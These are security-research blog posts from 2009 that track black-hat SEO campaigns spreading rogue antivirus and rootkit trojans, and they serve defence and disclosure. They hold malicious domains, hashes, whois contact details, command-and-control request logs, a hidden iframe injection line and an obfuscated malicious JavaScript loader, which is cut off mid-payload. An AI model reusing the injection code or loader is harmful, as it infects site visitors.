Friday, April 24, 2009

Black Hat SEO and Rogue Antivirus p.9

The silent threat: Black Hat SEO and Rogue Antivirus

Massive black hat campaign still growing: Easter related websites, Ned.org, Ford and more

READ THIS page if you need more information

After Trend Micro researchers claimed that Easter related sites were used to
redirect visitors to rogue antivirus websites, PandaLabs recently uncovered
similar Black hat SEO attacks against Ford and Ned.org.

By mis-using keywords typically related to global businesses and institutions,
the criminals attract unsuspecting visitors to compromized web sites. These sites
deceive visitors into downloading and installing a fake antivirus product that is
very hard to deactivate or remove.The rogue antivirus gives false alerts to the
user making them think that theircomputer is infected. Scared users are then
susceptible to buying the "antivirus protection" via a page that looks like a
secure SSL web site. In fact, their money are confidential credit card information
are stolen by the criminals the moment that they enter their personal information
into the payment page.

Many global companies, including Ford have been exploited in this way. Over a
million compromized web sites used Ford-based keywords to attract visitors to
fake antivirussites via search engines such as Google (Black hat SEO may force
Google to change algorithm
).Other examples of this attack include the mis-use
of Easter related keywords to attract unsuspecting visitors during the Easter
season (Trend Micro Malware Blog - Rotten Eggs: An Easter Malware Campaign).

There are other variants of this type of attack originating from the same
Ukraine / Russianbased criminal fraternity. For example, the criminals use technical
exploits to compromizeweb sites, blog, forums and the like. Wordpress blog
management software has been a victim of such an exploit allowing the criminals
to inject malicious code directly into all pages.A visitor to one of these infected
sites will beredirected to another site where rogue antivirus software is again
downloaded (PandaLabs: New Blackhat SEO attack exploits vulnerabilities in
Wordpressto distributerogue antivirus software
).

The criminals put a lot of effort into assuring the longevity of their scam.
Frequent IP changes and moving from location to location help ensure that
they can continue their activities.

You can get more information about all these attacks from the following
resources. The PandaLabs video gives a particularly clear and concise overview.

The following links provide more information about this attack:

The Tech Herald: Malicious SEO targets Ford Motor Company
PandaLabs
: Targeted Blackhat SEO Attack against Ford Motor Co.

Read the article on WebProNews: Blackhat SEO spammers force Google’s hand


Related attack:

PandaLabs
: Blackhat SEO Fueled Rogue Security Campaign
Sample hijacked search terms (text file)

The website implicated is: getscanonline.com (also hosted on 209.44.126.14).

Softpedia: Easter and Ford Search Results Poisoned

In this case, the files found on the site are detected by Trend Micro as

TROJ_FAKEAV.BAF
- JS_DLOADER.WKQ

The websites in question are: trustsecurityshield.com and topsecurity4you.com
which both have served for only two or three days (hosted on 209.44.126.14).



Technicals details can be found below


Vulnerabilities in Wordpress exploited to distribute rogue antivirus software

Watch the full video:



I will take your attention on the video above.

This is a screenshot at 03:11

If you zoom into it you will see the domain "load-archive-av-pro.com".
The domain is still active and shared with many other fake scanner websites
like "antivir-scan-pro-best.com" for the location of the payload.
Wepawet Analysis




The process:

I will take some words found on Ned.org for example.


The google cache:



The poisoned keywords:

"Kettle Vally Line Song"


The google search:



The redirection analysis:

hxxp://cropperddi.fortunecity.com/6766.html
hxxp://sandbergjbo.fortunecity.com/26894.html

Analysis -> redirect to a traffic management system
Analysis -> redirect to a traffic management system

hxxp://redirxl.com/filt/in.cgi?5&group=5q

which then redirect to the malicious site

hxxp://antivir-scan-pro-best.com/11038/3/

The payload in located on the same site that appear on the
PandaLabs article which is:

hxxp://files.load-archive-av-pro.com/normal/
setup_11038_3_1.exe


File size: 104971 bytes
MD5...: 2a9889219ec9d0124892e5e64eaed2bd

VirusTotal
Anubis

---------------------------

64.69.32.220

antivir-scan-pro-best.com

Registrant: Lee Brinkman (leebrinkm@gmail.com)
4396 Ross Street
Mount Vernon
Illinois,62864
US
Tel. +001.65746675653

Creation Date: 17-Apr-2009
Expiration Date: 17-Apr-2010

Domain servers in listed order:
ns2.antivir-scan-pro-best.com
ns1.antivir-scan-pro-best.com


Registrar:
DIRECTI INTERNET SOLUTIONS PVT. LTD.
D/B/A PUBLICDOMAINREGISTRY.COM

Also on this IP - previously used

checker-pc-pro-av.com
sheck-pro-as.com


---------------------------

195.88.80.127 - ECOWEB AS35695 - ecoweb.lv

load-archive-av-pro.com
files.load-archive-av-pro.com

Registrant:Mary Smalls (mary.sma0@gmail.com)
2251 Doctors Drive
Los Angeles
California,90066
US
Tel. +001.86758776498

Creation Date: 17-Apr-2009
Expiration Date: 17-Apr-2010

Domain servers in listed order:
ns2.load-archive-av-pro.com
ns1.load-archive-av-pro.com

Registrar:
DIRECTI INTERNET SOLUTIONS PVT. LTD.
D/B/A PUBLICDOMAINREGISTRY.COM

Also on this IP - previously used

download-pro-as.net
load-antivir-pro-pc.com
files.load-antivir-pro-pc.com
download-pro-as.net






From the article on PandaLabs' blog about the SEO attack against
Ford Motor Co. you can see the domain "globextubes.com"
previously hosted on 64.69.32.203.

This is a graph (from Robtex) of some of these sites serving in
the same campaign:

fasttube2009.com
globalstube2009.com
globextubes.com
streamingtubes2009.com




This is a file found on one of these site: softwarefortubeview.40011.exe

VirusTotal Report
Anubis Report



Complete analysis below:

After running it connect to this URL to received additional payloads to inject.

nhgfngfdhngf.com - 216.240.148.9

ThreatExpert Report

hxxp://nhgfngfdhngf.com/fff9999.php?aid=0&uid=00cd1a40d41d8
cd98f00b204e9800998ecf8427e&os=512

hxxp://nhgfngfdhngf.com/eee9999.php?aid=0&uid=00cd1a40d41d
8cd98f00b204e9800998ecf8427e&os=512

(216.240.148.9)


The page show these URL (Added file info and virustotal report)

----------------------------------------------------
hxxp://images2009best.com/perce/
30f07cdd01ead4f0dd74319d888cfdd9386f80b04bf230
740e19c810803919c83e9c9f487472375ee/70e/perce.jpg

VirusTotal - 4/40 (10%)
Anubis Report
File size: 94212 bytes
MD5...: e49048a38d0757b92a34dff6fc3b3f74

HTTP Activity:


----------------------------------------------------

hxxp://venerapictures.com/item/6000dc4d413ac4f08d
c431fdc85ccde9d80ff0a04b824084feb9c840903939083e0
c4f78441277ced/b0b/item.gif

VirusTotal - 7/40 (17.5%)
Anubis Report
File size: 145412 bytes
MD5...: d2b451fee4f7c42b06121cf03f8ea281

----------------------------------------------------
hxxp://venerapictures.com/werber/900/216.jpg

VirusTotal - 8/40 (20%)
Anubis Report
File size: 99332 bytes
MD5...: 5bc8a73f3412c574909e5f3c193fed89

----------------------------------------------------
hxxp://files.get-fails-load-av.com/exe/setup_200002.exe

VirusTotal - 9/40 (22.5%)
Anubis Report
File size: 78347 bytes
MD5...: ff220534519a1a116dbc2dd712bff24a

HTTP Activity:


----------------------------------------------------

hxxp://lwl-softwares.com/939.exe

VirusTotal - 0/39 (0%)
Anubis Report
File size: 180224 bytes
MD5...: 1ff562c02c68f0a8001135dc89b4eaa1

HTTP Activity:



----------------------------------------------------

hxxp://lwl-softwares.com/important.exe

Anubis Report
File size: 135168 byte
MD5...: 83b4560333601224cb0d5709bdf57191

Trojan.Win32.Tibs

 

Monday, April 20, 2009

Black Hat SEO and Rogue Antivirus p.8

The silent threat: Black Hat SEO and Rogue Antivirus

Fake Antivirus + Rootkit TDSS / Alureon / DNSChanger Trojan

READ THIS page if you need more information

A quick move to this IP block 209.44.126.0/24 by "Netelligent Hosting Services Inc" which hosts several fake av websites as well as exploits to spread the trojan TDSS/Alureon.

All of these have been found following iframe injected on legit websites, poisoned keyworks in Google Search Engine and links on ad network (screenshot below)


Check it out - maybe someone have access to your PC right now! Protect yourself.

Also Google show 14,800 result for this phrase.



Detection:

Trojan TDSS
Trojan DNSChanger
Trojan Kryptik
Trojan FakeSpyGuard
Trojan InternetAntivirusPro

Sites serving for the fake antivirus campaign:

209.44.126.14

activesecurityshield.com
anytoplikedsite.com
basevirusscan.com
bestfiresfull.com
bestsecurityupdate.com
checkonlinesecurity.com
cleanyourpcspace.com
destroyvirusnow.com
fastsecurityscan.com
fastviruscleaner.com
firstscansecurity.com
fuc*moneycash.com
fullandtotalsecurity.com
fullsecurityshield.com
getpcguard.com
getscanonline.com
getsecuritywall.com
greatsecurityshield.com
inetsecuritycenter.com
initialsecurityscan.com
mostpopularscan.com
myfirstsecurityscan.com
mytoplikedsite.com
mytopvirusscan.com
onlinescandetect.com
onlinescanservice.com
popularpcscan.com
runpcscannow.com
scanalertspage.com
scanbaseonline.com
scanprotectiononline.com
scanvistanow.net
securityscan4you.com
securitytopagent.com
thegreatsecurity.com
todaybestscan.com
topsecurity4you.com
topsecurityapp.com
topsoftscanner.com
totalpcdefender.com
totalvirusdestroyer.com
truescansecurity.com
trustsecurityshield.com
upyoursecurity.com
virustopshield.com
vistastabilitynow.com
vistastabilitynow.net
websecuritymaster.com
websecurityvoice.com
yourstabilitysystem.com

209.44.126.16
systemsecurityonline.com
systemsecuritytool.com

209.44.126.29
individualpeople.biz (will be analyzed below)

209.44.126.14
209.44.126.15
209.44.126.16
209.44.126.17
209.44.126.22
209.44.126.23


NS for rogue fake av websites

209.44.126.32
asmmnation.com
ThreatExpert report
In conjunction with an IP in ukraine : Symantec write up



On this IP 209.44.126.29 we also have a couple of page with exploits which leads to the trojan TDSS (Alureon).

I will take this domain for example "individualpeople[.]biz"

Malicious script (IFRAME) inserted. Redirection Analysis

<iframe src="hxxp://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>

Redirects to the page below which host several exploits. Javascript Analysis (Wepawet)

hxxp://individualpeople.biz/go.php?sid=6

Anubis Report

hxxp://209.44.126.30/unsecurity/pdf.php

Wepawet Analysis - VirusTotal

to finally load this page

hxxp://209.44.126.30/unsecurity/load.php

VirusTotal - Anubis

Detections:

W32/Alureon.B!Generic
Win32.Rootkit.TDSS.eyj.4
Packed.Win32.Tdss.f
Trojan.Win32.FakeSpyguard
Trojan:Win32/Alureon.gen!J
Trojan/Fakealert.gen

--------------------------------------

HTTP activity after infection

92.48.91.145:80 - [trafficstatic.net]

Request: GET /banner/crcmds/main
Response: 200 "OK"
Request: GET /banner/crcmds/init
Response: 200 "OK"
Request: GET /banner/uacsrcr.dat
Response: 200 "OK"
Request: GET /banner/crcmds/update
Response: 200 "OK"
Request: GET /banner/crfiles/uacd
Response: 200 "OK"
Request: GET /banner/crfiles/uacc
Response: 200 "OK"
Request: GET /banner/crfiles/uaclog
Response: 200 "OK"
Request: GET /banner/crfiles/uacmask
Response: 200 "OK"
Request: GET /banner/crfiles/uacserf
Response: 200 "OK"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/builds/bbr
Response: 200 "OK"
Request: GET /banner/crfiles/uacbbr
Response: 200 "OK"

72.233.114.126:80 - [statsanalist.cn]

Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5
Response: 200 "OK"
Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5
Response: 200 "OK"


IPs implicated:

209.44.126.14
209.44.126.15
209.44.126.16
209.44.126.17
209.44.126.22
209.44.126.23
209.44.126.29
209.44.126.32

Other domain in conjunction can be found using ThreatExpert

/banner/crcmds/main

Report 1
Report 2

92.48.91.144
trafficstatic.com
explorerex.com
windowslogonex.com

92.48.91.145
trafficstatic.net
ThreatExpert Report

95.211.14.159
golddiggero1.com

76.76.103.162
webieupdate.net

94.76.208.32
symupdate2.com
ThreatExpert Report

72.233.114.125
webnicrisoft.net
ThreatExpert Report

64.213.140.254
webmsupdate.net
ThreatExpert Report

 

Black Hat SEO - RBN Hacks, p.4

The silent threat: Black Hat SEO, exploits, hacks, botnets

Crimeware toolkits in the wild

READ THIS page if you need more information

WARNING: All sites listed on this page are dangerous (live URL with exploits)
which lead to trojans beeing automatically installed on your computer.
Do NOT visit them unless you know what you are doing.
(only links are safe)

Another very good example on the site below which lead to other domain in the network previously cited "Eurohost LLC " shows that this attack seems to be everywhere.

IFrames injected, pdf malware + viruses. Attached some screenshots.


Infected page:

hxxp://team-sleep.by.ru/default2.html

Analysis

hxxp://8addition.info/t/?75724cae9d
hxxp://sexbases.cn/in.cgi?16&161b72
hxxp://utevox.site90.com/f/index.php

************
Infected page:

hxxp://team-sleep.by.ru/demo.html

Analysis

Requests:

hxxp://bizoplata.ru/pay.html?
hxxp://bizoplata.ru/ballast.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://bizoplata.ru/post.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://mixbunch.cn/bowling.html
hxxp://famajormusic.ru/jjkj/pdf.php

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

************
Infected page:

hxxp://team-sleep.by.ru/gold.html

Analysis

Requests:

hxxp://team-sleep.by.ru/gold.html
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php

Redirects:

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php


************
Infected page:

hxxp://team-sleep.by.ru/googleanalyticsru.html

Analysis

Requests:

hxxp://team-sleep.by.ru/googleanalyticsru.html
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://sunmaiamibich.ru/

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

************
Infected page:

hxxp://team-sleep.by.ru/media.html

Analysis

Requests:

hxxp://team-sleep.by.ru/media.html
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php

Redirects:

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php


************
Infected page:

hxxp://team-sleep.by.ru/menu.html

Analysis

Requests:

hxxp://team-sleep.by.ru/menu.html
hxxp://bizoplata.ru/pay.html?
hxxp://bizoplata.ru/ballast.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://bizoplata.ru/post.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://mixbunch.cn/bowling.html

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php


************
Infected page:

hxxp://team-sleep.by.ru/news.html

Analysis

Requests:

hxxp://moneypuller.site90.net/images/gallery/index.php
hxxp://error.000webhost.com/not_found.html
hxxp://www.000webhost.com/?id=1
hxxp://www.000webhost.com/
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

************
Infected page:

hxxp://team-sleep.by.ru/photo2.html

Analysis

Requests:

hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php
hxxp://bizoplata.ru/pay.html?
hxxp://bizoplata.ru/ballast.html
hxxp://bizoplata.ru/post.html
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php


************
Infected page:

hxxp://team-sleep.by.ru/poem.html

Analysis

Requests:

hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php
hxxp://bizoplata.ru/pay.html?
hxxp://bizoplata.ru/ballast.html
hxxp://bizoplata.ru/post.html

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

************
Infected page:

hxxp://team-sleep.by.ru/press_reviews.html

Analysis

Requests:

hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php


************
Infected page:

hxxp://team-sleep.by.ru/team-sleep.html

Anaysis

Redirects:

hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

Redirects:

hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php


************
Infected page:

hxxp://team-sleep.by.ru/gmail.php

Analysis

Requests:

hxxp://counnter.cn/top100_00.js
hxxp://counnter.cn/z/count.php?o=1
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

Redirects:

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php


************
Infected page:

hxxp://team-sleep.by.ru/haitou.php

Analysis

Requests:

hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

************
Infected page:

hxxp://team-sleep.by.ru/in.php

Analysis

Requests:

hxxp://www.rogercombs.org/index.php
hxxp://5rublei.com/unique/index.php
hxxp://tochtonenado.com/yes/index.php

************
Infected page:

hxxp://team-sleep.by.ru/photo/team.html

Analysis

Requests:

hxxp://analytics-google.info/s/urchin.js
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php
hxxp://77.221.133.172/.if/go.html?
hxxp://by.ru/info/?where

************
Infected page:

hxxp://team-sleep.by.ru/photo/wallz.html

Analysis

Requests:

hxxp://analytics-google.info/s/urchin.js
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php
hxxp://bizoplata.ru/pay.html?
hxxp://bizoplata.ru/ballast.html
hxxp://bizoplata.ru/post.html
hxxp://by.ru/info/?where

************
Infected page:

hxxp://team-sleep.by.ru/photo/live/index2.html

Analysis

Requests:

hxxp://utevox.site90.com/f/index.php
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php

************
Infected page:

hxxp://team-sleep.by.ru/photo/live/imagepages/image1.html


Analysis

Requests:

hxxp://analytics-google.info/s/urchin.js
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php

************
Infected page:

hxxp://team-sleep.by.ru/photo/members/imagepages/image1.html

Analysis

Requests:

hxxp://analytics-google.info/s/urchin.js
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php

************
Infected page:

hxxp://team-sleep.by.ru/photo/team/imagepages/image1.html

Analysis

On this page the domain appears to be previously involved in the Asprox malware campaign. As you can see the fgg.js and script.js are still present on the page.

However all of these are not responding.

Finjan report
Google Searchfor fgg.js
Google Search for www.netcfg9.ru

hxxp://www.jve4.ru/fgg.js
hxxp://www.nmr43.ru/fgg.js
hxxp://www.mj5f.ru/script.js
hxxp://www.vswc.ru/script.js
hxxp://www.pkseio.ru/script.js
hxxp://www.4log-in.ru/script.js
hxxp://www.netcfg9.ru/script.js
hxxp://www.sitevgb.ru/script.js
hxxp://www.errghr.ru/script.js
hxxp://www.81dns.ru/script.js
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/golf.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/bowling.html
hxxp://sunmaiamibich.ru/pupu/in.php
hxxp://famajormusic.ru/jjkj/pdf.php


************
Infected page:

hxxp://tochtonenado.com/yes/index.php
hxxp://tochtonenado.com/yes/load.php?stat=Windows

Analysis

Trojan Waledac.GEN

Anubis Report

Botnet Controller

89.149.244.140:80 - [djbobroff.ru]
Request: GET /spm/index.php?id=584E5E43
Response: 200 "OK"
Request: GET /spm/index.php?id=584E5E43&download=0000138F
Response: 200 "OK"
Request: POST /spm/index.php?id=584E5E43&mid=5007
Response: 200 "OK"

C:\WINDOWS\system32\DRIVERS\asyncmac.sys

*****************

Exploits:

hxxp://5rublei.com/unique/index.phpAnalysis - VirusTotal - Anubis
hxxp://bizoplata.ru/ballast.htmlAnalysis
hxxp://bizoplata.ru/courier.htmlAnalysis
hxxp://bizoplata.ru/pay.html?Analysis
hxxp://bizoplata.ru/post.htmlAnalysis
hxxp://dasretokfin.com/load.phpAnalysis
hxxp://mixbunch.cn/thread.htmlAnalysis
hxxp://mixbunch.cn/golf.htmlAnalysis
hxxp://mixbunch.cn/bowling.htmlAnalysis
hxxp://peskufex.cn/ss/in.cgi?2Source
hxxp://startdontstop.ru/bigmac.htmlAnalysis
hxxp://sunmaiamibich.ru/pupu/in.phpAnalysis
hxxp://sunmaiamibich.ru/pupu/load.phpVirusTotal - Anubis
hxxp://tixwagoq.cn/in.cgi?4Analysis
hxxp://tochtonenado.com/yes/index.php Analysis
hxxp://tochtonenado.com/yes/load.phpAnubis
hxxp://tochtonenado.com/yes/include/spl.phpAnalysis
hxxp://utevox.site90.com/f/index.phpAnalysis
hxxp://utevox.site90.com/f/load.phpdead


91.212.41.91

hxxp://mixbunch.cn
hxxp://sunmaiamibich.ru

91.212.65.7

hxxp://peskufex.cn

95.129.144.228

hxxp://5rublei.com
hxxp://dasretokfin.com
hxxp://tochtonenado.com

95.129.144.13

hxxp://bizoplata.ru
hxxp://startdontstop.ru

64.235.52.170

hxxp://utevox.site90.com

************************

Domain Name: mixbunch.cn
ROID: 20081108s10001s82359461-cn
Domain Status: clientTransferProhibited
Registrant Organization: Raymond Keaton
Registrant Name: Raymond Keaton
Administrative Email: Keaton@cybernauttech.com
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server:ns1.softwaresupport-group.com
Name Server:ns2.softwaresupport-group.com
Registration Date: 2008-11-08 16:06
Expiration Date: 2009-11-08 16:06

domain: sunmaiamibich.ru
type: CORPORATE
nserver: ns1.softwaresupport-group.com.
nserver: ns2.softwaresupport-group.com.
state: REGISTERED, DELEGATED
person: Private person
phone: +7 910 3478712
e-mail: dmitrijstanislavskij@yandex.ru
registrar: REGRU-REG-RIPN
created: 2009.04.16
paid-till: 2010.04.16
source: TC-RIPN

Domain Name: peskufex.cn
ROID: 20090315s10001s50367993-cn
Domain Status: clientDeleteProhibited
Domain Status: clientTransferProhibited
Registrant Organization: 永也进出口公司
Registrant Name: 张龙
Administrative Email: alvin_555@yeah.net
Sponsoring Registrar: 易名中国
Name Server:ns2.dnsmytruedns.com
Name Server:ns1.dnsmytruedns.com
Registration Date: 2009-03-15 15:37
Expiration Date: 2010-03-15 15:37

Domain Name: 5rublei.com
Registrar: BIZCN.COM, INC.
Whois Server: whois.bizcn.com
Referral URL: http://www.bizcn.com
Name Server: NS1.EVERYDNS.NET
Name Server: NS2.EVERYDNS.NET
Name Server: NS3.EVERYDNS.NET
Name Server: NS4.EVERYDNS.NET
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 31-mar-2009
Creation Date: 30-jun-2008
Expiration Date: 30-jun-2010

Domain Name: dasretokfin.com
Registrar: REGTIME LTD.
Whois Server: whois.regtime.net
Referral URL: http://www.webnames.ru
Name Server: NS1.AFRAID.ORG
Name Server: NS2.AFRAID.ORG
Name Server: NS3.AFRAID.ORG
Name Server: NS4.AFRAID.ORG
Status: ok
Updated Date: 24-mar-2009
Creation Date: 18-feb-2009
Expiration Date: 18-feb-2010

Domain Name: tochtonenado.com
Registrar: UK2 GROUP LTD.
Whois Server: whois.hostingservicesinc.net
Referral URL: http://www.uk2group.com/
Name Server: NS1.EVERYDNS.NET
Name Server: NS2.EVERYDNS.NET
Name Server: NS3.EVERYDNS.NET
Name Server: NS4.EVERYDNS.NET
Status: clientTransferProhibited
Updated Date: 25-mar-2009
Creation Date: 25-mar-2009
Expiration Date: 25-mar-2010

domain: bizoplata.ru
type: CORPORATE
nserver: ns1.sevensearchon.ru
nserver: ns2.sevensearchon.ru
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 495 0000000
e-mail: tuhov83@mail.ru
registrar: CT-REG-RIPN
created: 2009.01.23
paid-till: 2010.01.23
source: TC-RIPN

domain: startdontstop.ru
type: CORPORATE
nserver: ns1.sevensearchon.ru.
nserver: ns2.sevensearchon.ru.
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 916 7843219
e-mail: ale32888049@yandex.ru
registrar: NAUNET-REG-RIPN
created: 2009.04.14
paid-till: 2010.04.14
source: TC-RIPN

Friday, April 17, 2009

Black Hat SEO - RBN Hacks, p.3

The silent threat: Black Hat SEO, exploits, hacks, botnets

Triple threats

READ THIS page if you need more information

WARNING: All sites listed on this page are dangerous (live URL with exploits)
which lead to trojans beeing automatically installed on your computer.
Do NOT visit them unless you know what you are doing.
(only links are safe)

The story about "Hosted JavaScript leading to .cn PDF Malware" which has implicated clarafin[.]info, fabiomotor[.]cn and letomerin[.]cn continue!

New sites appear as intermediaries for distributing malware.


About beebest[.]cn I will take this domain for example "cmizziconstruction.com"

The Diagnostic page for cmizziconstruction.com. (Provided by Google Safe Browsing)

In the source code we can see:

<script>function c274acb4b1h49d2e3646f592(h49d2e3646fd61){ function h49d
2e36470534(){return 16;} return (parseInt(h49d2e3646fd61,h49d2e36470534()
));}function h49d2e364714d7(h49d2e36471ca8){ function h49d2e36473415(){
var h49d2e36473be3=2;return h49d2e36473be3;} var h49d2e364724a8='';h49
d2e36474427=String.fromCharCode;for(h49d2e36472c43=0;h49d2e36472c43<
h49d2e36471ca8.length;h49d2e36472c43+=h49d2e36473415()){ h49d2e3647
24a8+=(h49d2e36474427(c274acb4b1h49d2e3646f592(h49d2e36471ca8.subst
r(h49d2e36472c43,h49d2e36473415()))));}return h49d2e364724a8;} var r36=''
;var h49d2e36474be1='3C7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E696628
216D7'+r36+'96961297'+r36+'B646F637'+r36+'56D656E7'+r36+'42E7'+r36+'7'+
r36+'7'+r36+'2697'+r36+'465287'+r36+'56E657'+r36+'363617'+r36+'065282027
'+r36+'2533632536392536362537'+r36+'3225363125366425363525323025366
5253631253664253635253364253633253332253337'+r36+'2532302537'+r36+'
332537'+r36+'32253633253364253237'+r36+'2536382537'+r36+'342537'+r36+
'342537'+r36+'302533612532662532662536352537'+r36+'382537'+r36+'34253
